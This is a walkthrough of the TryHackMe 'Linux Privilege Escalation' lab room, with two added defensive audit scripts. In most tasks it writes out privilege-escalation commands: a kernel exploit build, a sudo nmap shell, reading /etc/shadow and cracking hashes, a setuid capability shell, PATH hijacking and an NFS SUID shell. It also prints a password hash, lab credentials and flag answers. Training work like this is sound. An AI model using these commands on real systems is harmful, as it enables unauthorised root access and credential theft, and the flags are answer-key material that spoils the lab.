Tryhackme - Linux Privilege Escalation

In this walkthrough, we will go through the Linux Privilege Escalation room from Tryhackme. The room is rated Medium on the platform and teaches the fundamentals of Linux privilege escalation, from enumeration to exploitation, covering 8 different privilege escalation techniques. So, let’s get started without any delay.

Task 1 – Introduction

Task 2 – What is Privilege Escalation?

What does “Linux privilege escalation” mean?

At its core, privilege escalation usually involves going from a lower-permission account to a higher-permission one. More technically, it’s the exploitation of a vulnerability, design flaw, or configuration oversight in an operating system or application to gain unauthorized access to resources that are usually restricted from users.

Task 3 – Enumeration

Question 1 – What is the hostname of the target system?

hostname

wade7363

Question 2 – What is the Linux kernel version of the target system?

uname -r

3.13.0-24-generic

Question 3 – What Linux is this?

cat /etc/issue

Ubuntu 14.04 LTS

Question 4 – What version of the Python language is installed on the system?

python

2.7.6

Question 5 – What vulnerability seems to affect the kernel of the target system? (Enter a CVE number)

CVE-2015-1328

Task 4 – Automated Enumeration Tools

Task 5 – Privilege Escalation: Kernel Exploits

Question 1 – Find and use the appropriate kernel exploit to gain root privileges on the target system.

Done

Link: https://www.exploit-db.com/exploits/37292

CVE-2015-1328

Question 2 – What is the content of the flag1.txt file?

wget 37292.c

gcc 37292.c -o ofs

Flag 1

THM-28392872729920

Task 6 – Privilege Escalation: Sudo

Question 1 – How many programs can the user “karen” run on the target system with sudo rights?

sudo -l

3

Question 2 – What is the content of the flag2.txt file?

Flag 2

THM-402028394

Question 3 – How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?

sudo nmap --interactive

Question 4 – What is the hash of frank’s password?

sudo -l

sudo less /etc/shadow

frank
$6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1:18796:0:99999:

Task 7 – Privilege Escalation: SUID

Question 1 – Which user shares the name of a great comic book writer?

cat /etc/passwd

gerryconway

Question 2 – What is the password of user2?

user 2

LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode

karen password

unshadow passwd.txt shadow.txt > finalpasswords.txt
john finalpasswords.txt

Password1

Question 3 – What is the content of the flag3.txt file?

LFILE=/home/ubuntu/flag3.txt
base64 "$LFILE" | base64 --decode

Flag 3

THM-3847834

Task 8 – Privilege Escalation: Capabilities

Question 1 – Complete the task described above on the target system

Done

Question 2 – How many binaries have set capabilities?

getcap -r / 2>/dev/null
6

Question 3 – What other binary can be used through its capabilities?

view

Question 4 – What is the content of the flag4.txt file?

./view -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
Flag 4
THM-9349843
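
The defensive counterpart of this task, as an added example that is not part of the original walkthrough: a POSIX shell function that reads the output of getcap -r / and lists every file carrying cap_setuid, the capability the os.setuid(0) call above relies on. The sample listing and its paths are constructed; both the older "path = caps+ep" and the newer "path caps=ep" getcap output formats are handled.

```sh
#!/bin/sh
# Added example: list files whose file capabilities include cap_setuid.
# Input is the text printed by: getcap -r / 2>/dev/null

flag_setuid_caps() {
    awk '
    {
        sep = index($0, " = ")
        if (sep > 0) {                          # older libcap: "path = caps+ep"
            path = substr($0, 1, sep - 1)
            caps = substr($0, sep + 3)
        } else if (match($0, / cap_[a-z0-9_,]+[=+-]/)) {   # newer: "path caps=ep"
            path = substr($0, 1, RSTART - 1)
            caps = substr($0, RSTART + 1)
        } else {
            next                                # not a getcap result line
        }
        # Split the clause list into capability names and flag letters, then
        # require an exact cap_setuid token (a longer name would not match).
        n = split(caps, tok, /[ ,=+-]+/)
        for (i = 1; i <= n; i++)
            if (tok[i] == "cap_setuid") { print path; break }
    }' "$@"
}

# Constructed sample output; the paths are illustrative, not from the target.
sample_getcap() {
    cat <<'EOF'
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/opt/tools/vim = cap_setuid+ep
/opt/tools/view = cap_setuid+ep
/usr/bin/python3 cap_setuid,cap_net_bind_service=ep
/usr/bin/dumpcap cap_net_admin,cap_net_raw=eip
EOF
}

sample_getcap | flag_setuid_caps
```

On a live host, pipe the real listing in instead: getcap -r / 2>/dev/null | flag_setuid_caps. Any editor or interpreter in the result should have the capability removed with setcap -r.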

Task 9 – Privilege Escalation: Cron Jobs

Question 1 – How many user-defined cron jobs can you see on the target system?

cron jobs
4

Question 2 – What is the content of the flag5.txt file?

backup.sh

netcat listener

Flag 5

THM-383000283

Question 3 – What is Matt’s password?

unshadow
123456

Task 10 – Privilege Escalation: PATH

Question 1 – What is the odd folder you have write access for?

find / -writable 2>/dev/null | grep home | cut -d "/" -f 2,3| sort -u

/home/murdoch

Question 2 – Exploit the $PATH vulnerability to read the content of the flag6.txt file.

Done

echo "cat /home/matt/flag6.txt" > thm

echo $PATH

Question 3 – What is the content of the flag6.txt file?

Flag 6
THM-736628929

Task 11 – Privilege Escalation: NFS

Question 1 – How many mountable shares can you identify on the target system?

cat /etc/exports
showmount -e

3

Question 2 – How many shares have the “no_root_squash” option enabled?

3

Question 3 – Gain a root shell on the target system

Done
showmount -e 10.10.223.142
mkdir /tmp/rootshell

sudo mount -o rw 10.10.223.142:/home/backup /tmp/rootshell

nfs.c
gcc nfs.c -o nfs -w
chmod +s nfs
ls -l nfs
ls /tmp/test
ls /tmp
user id
root shell

Question 4 – What is the content of the flag7.txt file?

Flag7

THM-89384012
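
How to spot the misconfiguration this task depends on, as an added example that is not part of the original walkthrough: a POSIX shell function that parses /etc/exports-style text and lists each export and client whose effective options include no_root_squash. The sample file is constructed (only /home/backup appears in the walkthrough); quoted paths containing spaces are not handled, and per-client options are assumed to override dash-prefixed line defaults as described in exports(5).

```sh
#!/bin/sh
# Added example: report NFS exports that disable root squashing.
# Usage: audit_exports /etc/exports   (or pipe the text on stdin)

audit_exports() {
    awk '
    /\\$/ { sub(/\\$/, ""); buf = buf $0; next }   # join continued lines
    {
        line = buf $0; buf = ""
        sub(/#.*/, "", line)                        # drop comments
        n = split(line, f)                          # f[1] is the exported path
        defaults = ""
        for (i = 2; i <= n; i++) {
            if (f[i] ~ /^-/) { defaults = substr(f[i], 2); continue }
            client = f[i]; opts = ""
            p = index(client, "(")
            if (p > 0) {
                opts = substr(client, p + 1); sub(/\).*/, "", opts)
                client = substr(client, 1, p - 1)
            }
            if (client == "") client = "*"          # "(opts)" alone means any host
            own = "," opts ","; dfl = "," defaults ","
            # root_squash is the default, so flag only an explicit
            # no_root_squash that the client entry does not override.
            if (own ~ /,no_root_squash,/ ||
                (own !~ /,root_squash,/ && dfl ~ /,no_root_squash,/))
                print f[1], client
        }
    }' "$@"
}

# Constructed sample file, not the exports file of the target machine.
sample_exports() {
    cat <<'EOF'
# constructed sample
/home/backup   *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/projects  -rw,no_root_squash 10.0.0.5 10.0.0.6(ro,root_squash)
/srv/media     10.0.0.0/24(ro,sync) \
               build01(rw,no_root_squash)
/srv/public    *(ro,all_squash)
EOF
}

sample_exports | audit_exports
```

Each reported pair is an export where a remote root user keeps UID 0 on the share; removing no_root_squash and re-exporting with exportfs -ra restores the default root_squash mapping.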

Task 12 – Capstone Challenge

You have gained SSH access to a large scientific facility. Try to elevate your privileges until you are Root.
We designed this room to help you build a thorough methodology for Linux privilege escalation that will be very useful in exams such as OSCP and your penetration testing engagements.

Leave no privilege escalation vector unexplored, privilege escalation is often more an art than a science.

You can access the target machine over your browser or use the SSH credentials below.

  • Username: leonard
  • Password: Penny123

Priv Esc techniques used:

  • SUID
  • Sudo
SSH login
find / -type f -perm -04000 -ls 2>/dev/null

LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode
unshadow

find . -name flag1.txt
find . -exec /bin/sh \; -quit 

GTFObins find
sudo -l

Question 1 – What is the content of the flag1.txt file?

THM-42828719920544

Question 2 – What is the content of the flag2.txt file?

THM-168824782390238
So that was “Linux Privilege Escalation” for you. In this room, we covered a variety of Linux privilege escalation techniques that we can use once we have landed on a Linux machine. The best thing on any machine is to be root, and today we learned how to get to that point. On that note, I will take my leave and meet you in the next one. Till then, “Happy hacking”.
